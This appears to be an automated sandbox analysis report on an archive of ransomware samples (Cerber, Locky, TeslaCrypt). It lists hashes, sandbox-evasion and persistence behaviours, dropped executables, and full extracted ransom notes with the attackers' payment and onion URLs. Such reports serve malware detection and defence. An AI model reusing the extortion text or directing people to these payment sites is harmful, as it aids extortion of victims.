cerber | 886e4e9bfd023378759fccaf66af2b1cd12394530386518eb828d0cc05bb7d86

Analysis

max time kernel
215s
max time network
278s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
16-11-2024 23:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RNSM00298.7z
Size

10.6MB
MD5

50a7d6abb0f7d5aba30b7e779739a9e9
SHA1

b2f1005c34f0e01bc1bc2e90e5c06304cdd2cd44
SHA256

886e4e9bfd023378759fccaf66af2b1cd12394530386518eb828d0cc05bb7d86
SHA512

5966d7cf85c2a580f6d89af2600a1e5d664ad02850d90abef491d12bda8edaf5cca329090995942b259341fdba863f5fcfcf32f74ed4184afbb7d03b99fa8afb
SSDEEP

196608:NLaJSRe3no/eZ442cPJRFJGRgilUNxM4rhtHWi2m+8cTMJXZaVPO0+2V:NmIR4JbFJGRQvrjHWyXYVG2V

Score

10^/10

cerber locky_lukitus teslacrypt defense_evasion discovery evasion execution impact persistence ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_RECoVERY_+dxqdb.txt

Family

teslacrypt

Ransom Note

NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with AES More information about the encryption keys using AES can be found here: http://en.wikipedia.org/wiki/AES How did this happen ? !!! Specially for your PC was generated personal AES KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://yyre45dbvn2nhbefbmh.begumvelic.at/9BAB94816838B211 2. http://uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com/9BAB94816838B211 3. http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/9BAB94816838B211 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser 3. Type in the address bar: xlowfznrg4wf7dli.onion/9BAB94816838B211 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://yyre45dbvn2nhbefbmh.begumvelic.at/9BAB94816838B211 http://uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com/9BAB94816838B211 http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/9BAB94816838B211 *-*-* Your personal page Tor-Browser: xlowfznrg4wf7dli.ONION/9BAB94816838B211

URLs

http://yyre45dbvn2nhbefbmh.begumvelic.at/9BAB94816838B211

http://uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com/9BAB94816838B211

http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/9BAB94816838B211

http://xlowfznrg4wf7dli.ONION/9BAB94816838B211

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+ceksj.txt

Ransom Note

__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://p57gest54celltraf743knjf.mottesapo.com/C4155CE0F8803A93 2. http://k4restportgonst34d23r.oftpony.at/C4155CE0F8803A93 3. http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/C4155CE0F8803A93 If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization 3. Type in the address bar: fwgrhsao3aoml7ej.onion/C4155CE0F8803A93 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *** Your personal pages: http://p57gest54celltraf743knjf.mottesapo.com/C4155CE0F8803A93 http://k4restportgonst34d23r.oftpony.at/C4155CE0F8803A93 http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/C4155CE0F8803A93 *** Your personal page Tor-Browser: fwgrhsao3aoml7ej.ONION/C4155CE0F8803A93 *** Your personal identification ID: C4155CE0F8803A93

URLs

http://p57gest54celltraf743knjf.mottesapo.com/C4155CE0F8803A93

http://k4restportgonst34d23r.oftpony.at/C4155CE0F8803A93

http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/C4155CE0F8803A93

http://fwgrhsao3aoml7ej.onion/C4155CE0F8803A93

http://fwgrhsao3aoml7ej.ONION/C4155CE0F8803A93

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+cpvxr.txt

Ransom Note

NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA4096 More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA4096 Key , both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So , there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1 - http://t54ndnku456ngkwsudqer.wallymac.com/9BAB94816838B211 2 - http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/9BAB94816838B211 3 - http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/9BAB94816838B211 If for some reasons the addresses are not available, follow these steps: 1 - Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2 - After a successful installation, run the browser 3 - Type in the address bar: xlowfznrg4wf7dli.onion/9BAB94816838B211 4 - Follow the instructions on the site IMPORTANT INFORMATION Your personal pages http://t54ndnku456ngkwsudqer.wallymac.com/9BAB94816838B211 http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/9BAB94816838B211 http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/9BAB94816838B211 Your personal page Tor-Browser xlowfznrg4wf7dli.ONION/9BAB94816838B211

URLs

http://t54ndnku456ngkwsudqer.wallymac.com/9BAB94816838B211

http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/9BAB94816838B211

http://hrfgd74nfksjdcnnklnwefvdsf.materdunst.com/9BAB94816838B211

http://xlowfznrg4wf7dli.onion/9BAB94816838B211

http://xlowfznrg4wf7dli.ONION/9BAB94816838B211

Extracted

Path

C:\Users\Admin\Downloads\README.hta

Ransom Note

<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>CERBER RANSOMWARE - Instructions</title> <HTA:APPLICATION APPLICATIONNAME="Cerber Ransomware: Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 13pt; line-height: 19pt; } body, h1 { margin: 0; padding: 0; } hr { color: #bda; height: 2pt; margin: 1.5%; } h1 { color: #555; font-size: 14pt; } ol { padding-left: 2.5%; } ol li { padding-bottom: 13pt; } small { color: #555; font-size: 11pt; } ul { list-style-type: none; margin: 0; padding: 0; } .button { color: #04a; cursor: pointer; } .button:hover { text-decoration: underline; } .container { background-color: #fff; border: 2pt solid #c7c7c7; margin: 2.5%; min-width: 850px; padding: 2.5%; } .header { border-bottom: 2pt solid #c7c7c7; margin-bottom: 2.5%; padding-bottom: 2.5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .info { background-color: #efe; border: 2pt solid #bda; display: inline-block; padding: 1.5%; text-align: center; } .updating { color: red; display: none; } #change_language { float: right; } #change_language, #texts div { display: none; } </style> </head> <body> <div class="container"> <div class="header"> <a href="#" id="change_language" onclick="return changeLanguage();" title="English">☑ English</a> <h1>CERBER RANSOMWARE</h1> Instructions </div> <div id="languages"> ☑ Select your language <ul> <li><a href="#" title="English" onclick="return showBlock('en');">English</a></li> <li><a href="#" title="Arabic" onclick="return showBlock('ar');">العربية</a></li> <li><a href="#" title="Chinese" onclick="return showBlock('zh');">中文</a></li> <li><a href="#" title="Dutch" onclick="return showBlock('nl');">Nederlands</a></li> <li><a href="#" title="French" onclick="return showBlock('fr');">Français</a></li> <li><a href="#" title="German" onclick="return showBlock('de');">Deutsch</a></li> <li><a href="#" title="Italian" onclick="return showBlock('it');">Italiano</a></li> <li><a href="#" title="Japanese" onclick="return showBlock('ja');">日本語</a></li> <li><a href="#" title="Korean" onclick="return showBlock('ko');">한국어</a></li> <li><a href="#" title="Polish" onclick="return showBlock('pl');">Polski</a></li> <li><a href="#" title="Portuguese" onclick="return showBlock('pt');">Português</a></li> <li><a href="#" title="Spanish" onclick="return showBlock('es');">Español</a></li> <li><a href="#" title="Turkish" onclick="return showBlock('tr');">Türkçe</a></li> </ul> </div> <div id="texts"> <div id="en"> Can't you find the necessary files? Is the content of your files not readable? It is normal because the files' names and the data in your files have been encrypted by "Cerber Ransomware". It means your files are NOT damaged! Your files are modified only. This modification is reversible. From now it is not possible to use your files until they will be decrypted. The only way to decrypt your files safely is to buy the special decryption software "Cerber Decryptor". Any attempts to restore your files with the third-party software will be fatal for your files! <hr> You can proceed with purchasing of the decryption software at your personal page: Please wait...<a id="megaurl" class="url" href="http://ftoxmpdipwobp4qy.vc5s8b.top/ABB7-22A5-6CE9-0091-BA55" target="_blank">http://ftoxmpdipwobp4qy.vc5s8b.top/ABB7-22A5-6CE9-0091-BA55</a><a href="http://ftoxmpdipwobp4qy.gwz8gh.top/ABB7-22A5-6CE9-0091-BA55" target="_blank">http://ftoxmpdipwobp4qy.gwz8gh.top/ABB7-22A5-6CE9-0091-BA55</a><a href="http://ftoxmpdipwobp4qy.onion.to/ABB7-22A5-6CE9-0091-BA55" target="_blank">http://ftoxmpdipwobp4qy.onion.to/ABB7-22A5-6CE9-0091-BA55</a> If this page cannot be opened  click here  to generate a new address to your personal page. At this page you will receive the complete instructions how to buy the decryption software for restoring all your files. Also at this page you will be able to restore any one file for free to be sure "Cerber Decryptor" will help you. <hr> If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser: <ol> <li>run your Internet browser (if you do not know what it is run the Internet Explorer);</li> <li>enter or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loading;</li> <li>on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>run Tor Browser;</li> <li>connect with the button "Connect" (if you use the English version);</li> <li>a normal Internet browser window will be opened after the initialization;</li> <li>type or copy the address http://ftoxmpdipwobp4qy.onion/ABB7-22A5-6CE9-0091-BA55 in this browser address bar;</li> <li>press ENTER;</li> <li>the site should be loaded; if for some reason the site is not loading wait for a moment and try again.</li> </ol> If you have any problems during installation or use of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the search bar "Install Tor Browser Windows" and you will find a lot of training videos about Tor Browser installation and use. <hr> Additional information: You will find the instructions ("*.hta") for restoring your files in any folder with your encrypted files. The instructions ("*.hta") in the folders with your encrypted files are not viruses! The instructions ("*.hta") will help you to decrypt your files. Remember! The worst situation already happened and now the future of your files depends on your determination and speed of your actions. </div> <div id="ar" style="direction: rtl;"> لا يمكنك العثور على الملفات الضرورية؟ هل محتوى الملفات غير قابل للقراءة؟ هذا أمر طبيعي لأن أسماء الملفات والبيانات في الملفات قد تم تشفيرها بواسطة "Cerber Ransomware". وهذا يعني أن الملفات الخاصة بك ليست تالفة! فقد تم تعديل ملفاتك فقط. ويمكن التراجع عن هذا. ومن الآن فإنه لا يكن استخدام الملفات الخاصة بك حتى يتم فك تشفيرها. الطريقة الوحيدة لفك تشفير ملفاتك بأمان هو أن تشتري برنامج فك التشفير المتخصص "Cerber Decryptor". إن أية محاولات لاستعادة الملفات الخاصة بك بواسطة برامج من طرف ثالث سوف تكون مدمرة لملفاتك! <hr> يمكنك الشروع في شراء برنامج فك التشفير من صفحتك الشخصية: أرجو الإنتظار...<a class="url" href="http://ftoxmpdipwobp4qy.vc5s8b.top/ABB7-22A5-6CE9-0091-BA55" target="_blank">http://ftoxmpdipwobp4qy.vc5s8b.top/ABB7-22A5-6CE9-0091-BA55</a><a href="http://ftoxmpdipwobp4qy.gwz8gh.top/ABB7-22A5-6CE9-0091-BA55" target="_blank">http://ftoxmpdipwobp4qy.gwz8gh.top/ABB7-22A5-6CE9-0091-BA55</a><a href="http://ftoxmpdipwobp4qy.onion.to/ABB7-22A5-6CE9-0091-BA55" target="_blank">http://ftoxmpdipwobp4qy.onion.to/ABB7-22A5-6CE9-0091-BA55</a> في حالة تعذر فتح هذه الصفحة  انقر هنا  لإنشاء عنوان جديد لصفحتك الشخصية. في هذه الصفحة سوف تتلقى تعليمات كاملة حول كيفية شراء برنامج فك التشفير لاستعادة جميع الملفات الخاصة بك. في هذه الصفحة أيضًا سوف تتمكن من استعادة ملف واحد بشكل مجاني للتأكد من أن "Cerber Decryptor" سوف يساعدك. <hr> إذا كانت صفحتك الشخصية غير متاحة لفترة طويلة فإن ثمّة طريقة أخرى لفتح صفحتك الشخصية - تحميل واستخدام متصفح Tor: <ol> <li>قم بتشغيل متصفح الإنترنت الخاص بك (إذا كنت لا تعرف ما هو قم بتشغيل إنترنت إكسبلورر);</li> <li>قم بكتابة أو نسخ العنوان <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> إلى شريط العنوان في المستعرض الخاص بك ثم اضغط ENTER;</li> <li>انتظر لتحميل الموقع;</li> <li>سوف يعرض عليك الموقع تحميل متصفح Tor. قم بتحميله وتشغيله، واتبع تعليمات التثبيت، وانتظر حتى اكتمال التثبيت;</li> <li>قم بتشغيل متصفح Tor;</li> <li>اضغط على الزر "Connect" (إذا كنت تستخدم النسخة الإنجليزية);</li> <li>سوف تُفتح نافذة متصفح الإنترنت العادي بعد البدء;</li> <li>قم بكتابة أو نسخ العنوان http://ftoxmpdipwobp4qy.onion/ABB7-22A5-6CE9-0091-BA55 في شريط العنوان في المتصفح;</li> <li>اضغط ENTER;</li> <li>يجب أن يتم تحميل الموقع؛ إذا لم يتم تحميل الموقع لأي سبب، انتظر للحظة وحاول مرة أخرى.</li> </ol> إذا كان لديك أية مشكلات أثناء عملية التثبيت أو استخدام متصفح Tor، يُرجى زيارة <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> واكتب الطلب "install tor browser windows" أو "تثبيت نوافذ متصفح Tor" في شريط البحث، وسوف تجد الكثير من أشرطة الفيديو للتدريب حول تثبيت متصفح Tor واستخدامه. <hr> معلومات إضافية: سوف تجد إرشادات استعادة الملفات الخاصة بك ("*.hta") في أي مجلد مع ملفاتك المشفرة. الإرشادات ("*.hta") الموجودة في المجلدات مع ملفاتك المشفرة ليست فيروسات والإرشادات ("*.hta") سوف تساعدك على فك تشفير الملفات الخاصة بك. تذكر أن أسوأ موقف قد حدث بالفعل، والآن مستقبل ملفاتك يعتمد على عزيمتك وسرعة الإجراءات الخاصة بك. </div> <div id="zh"> 您找不到所需的文件？ 您文件的内容无法阅读？ 这是正常的，因为您文件的文件名和数据已经被“Cerber Ransomware”加密了。 这意味着您的文件并没有损坏！您的文件只是被修改了，这个修改是可逆的，解密之前您无法使用您的文件。 安全解密您文件的唯一方式是购买特别的解密软件“Cerber Decryptor”。 任何使用第三方软件恢复您文件的方式对您的文件来说都将是致命的！ <hr> 您可以在您的个人页面上购买解密软件： 请稍候...<a class="url" href="http://ftoxmpdipwobp4qy.vc5s8b.top/ABB7-22A5-6CE9-0091-BA55" target="_blank">http://ftoxmpdipwobp4qy.vc5s8b.top/ABB7-22A5-6CE9-0091-BA55</a><a href="http://ftoxmpdipwobp4qy.gwz8gh.top/ABB7-22A5-6CE9-0091-BA55" target="_blank">http://ftoxmpdipwobp4qy.gwz8gh.top/ABB7-22A5-6CE9-0091-BA55</a><a href="http://ftoxmpdipwobp4qy.onion.to/ABB7-22A5-6CE9-0091-BA55" target="_blank">http://ftoxmpdipwobp4qy.onion.to/ABB7-22A5-6CE9-0091-BA55</a> 如果这个页面无法打开，请 点击这里 生成您个人页面的新地址。 您将在这个页面上看到如何购买解密软件以恢复您的文件。 您可以在这个页面使用“Cerber Decryptor”免费恢复任何文件。 <hr> 如果您的个人页面长期不可用，有其他方法可以打开您的个人页面 - 安装并使用 Tor 浏览器： <ol> <li>使用您的上网浏览器（如果您不知道使用 Internet Explorer 的话）；</li> <li>在浏览器的地址栏输入或复制地址 <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> 并按 ENTER 键；</li> <li>等待站点加载；</li> <li>您将在站点上下载 Tor 浏览器；下载并运行它，按照安装指南进行操作，等待直至安装完成；</li> <li>运行 Tor 浏览器；</li> <li>使用“Connect”按钮进行连接（如果您使用英文版）；</li> <li>初始化之后将打开正常的上网浏览器窗口；</li> <li>在浏览器地址栏中输入或复制地址 http://ftoxmpdipwobp4qy.onion/ABB7-22A5-6CE9-0091-BA55 </li> <li>按 ENTER 键；</li> <li>该站点将加载；如果由于某些原因等待一会儿后没有加载，请重试。</li> </ol> 如果在安装期间或使用 Tor 浏览器期间有任何问题，请访问 <a href="https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8" target="_blank">https://www.baidu.com</a> 并在搜索栏中输入“怎么安装 Tor 浏览器”，您将找到有关如何安装洋葱 Tor 浏览器的说明和教程。 <hr> 附加信息： 您将在任何带有加密文件的文件夹中找到恢复您文件(“*.hta”)的说明。 带有加密文件的文件夹中的(“*.hta”)说明不是病毒，(“*.hta”)说明将帮助您解密您的文件。 请记住，最坏的情况都发生过了，您的文件还能不能用取决于您的决定和反应速度。 </div> <div id="nl"> Kunt u de nodige files niet vinden? Is de inhoud van uw bestanden niet leesbaar? Het is gewoonlijk omdat de bestandsnamen en de gegevens in uw bestanden zijn versleuteld door “Cerber Ransomware”. Het betekent dat uw bestanden NIET beschadigd zijn! Uw bestanden zijn alleen gewijzigd. Deze wijziging is omkeerbaar. Vanaf nu is het niet mogelijk uw bestanden te gebruiken totdat ze ontsleuteld zijn. De enige manier om uw bestanden veilig te ontsleutelen is

Signatures

Cerber
Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.
ransomware cerber
Cerber family
cerber
Locky (Lukitus variant)
Variant of the Locky ransomware seen in the wild since late 2017.
ransomware locky_lukitus
Locky_lukitus family
locky_lukitus

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2640	3068	mshta.exe	139

TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
ransomware teslacrypt
Teslacrypt family
teslacrypt
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions	regsvr32.exe

Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened (read-only)	C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys	regsvr32.exe

Renames multiple (462) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Contacts a large (1323) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Looks for VMWare Tools registry key 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools	regsvr32.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	regsvr32.exe

Drops startup file 25 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_RECoVERY_+dxqdb.png	hbtwdghtnrjw.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_RECoVERY_+dxqdb.html	hbtwdghtnrjw.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_RECoVERY_+dxqdb.txt	hbtwdghtnrjw.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Recovery+ceksj.html	kugvwgbsmmic.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReCoVeRy_+cpvxr.png	khatelpdxqwo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReCoVeRy_+cpvxr.html	khatelpdxqwo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReCoVeRy_+xqdbu.png	ocenlufjyvdi.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReCoVeRy_+xqdbu.txt	ocenlufjyvdi.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_ReCoVeRy_+cpvxr.html	khatelpdxqwo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_ReCoVeRy_+xqdbu.html	ocenlufjyvdi.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Recovery+ceksj.png	kugvwgbsmmic.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_RECoVERY_+dxqdb.html	hbtwdghtnrjw.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\adf349.lnk	regsvr32.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery+ceksj.txt	kugvwgbsmmic.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery+ceksj.html	kugvwgbsmmic.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_ReCoVeRy_+cpvxr.txt	khatelpdxqwo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_ReCoVeRy_+xqdbu.png	ocenlufjyvdi.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_ReCoVeRy_+xqdbu.txt	ocenlufjyvdi.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_RECoVERY_+dxqdb.png	hbtwdghtnrjw.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recovery+ceksj.png	kugvwgbsmmic.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Recovery+ceksj.txt	kugvwgbsmmic.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReCoVeRy_+cpvxr.txt	khatelpdxqwo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_ReCoVeRy_+cpvxr.png	khatelpdxqwo.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_ReCoVeRy_+xqdbu.html	ocenlufjyvdi.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_RECoVERY_+dxqdb.txt	hbtwdghtnrjw.exe

Executes dropped EXE 30 IoCs

pid	Process
2428	HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe
2632	HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe
2124	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2844	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
1096	anli.exe
3016	HEUR-Trojan-Ransom.Win32.Locky.vho-c6bb72e0a48fcf77920ddc48dd799f04a73ca287f56afb3dd5709725a67e8564.exe
2948	anli.exe
1216	Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe
1732	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
2724	Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe
920	Trojan-Ransom.Win32.Bitman.lli-c1f58f6b35fba846df52983a880afa4aea441e19b446c753eff7da1a942c09ca.exe
1432	Trojan-Ransom.Win32.Bitman.noi-73a2ed1606f22e828554948d7f79dd99f2858bc3465e5065abcbf90d98583b3c.exe
2220	Trojan-Ransom.Win32.Bitman.qkb-0f7b56a20b8b81412d2ad1f9b80ee6002f6875105f546a7a8404a43ed73b1ef4.exe
2704	HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe
2516	hbtwdghtnrjw.exe
2780	Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe
2252	Trojan-Ransom.Win32.Cryptor.agg-8e68f65eb8f0e02cf203c31d8cbb5e5c30bc78e06d77272b4493ca1c97fc048d.exe
1836	Trojan-Ransom.Win32.Cryptor.asv-826b02f896032d0abb0afb2f4a5228f8dc148518f29007929cc8b5368dc1dec2.exe
2568	ocenlufjyvdi.exe
1692	fjyvdiaajoqw.exe
2760	Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe
2260	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
1004	Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe
1612	kugvwgbsmmic.exe
2528	Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe
2056	khatelpdxqwo.exe
2348	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
3348	kugvwgbsmmic.exe
3940	khatelpdxqwo.exe
2784	Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe

Loads dropped DLL 13 IoCs

pid	Process
2428	HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe
2844	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
2844	HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe
1216	Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe
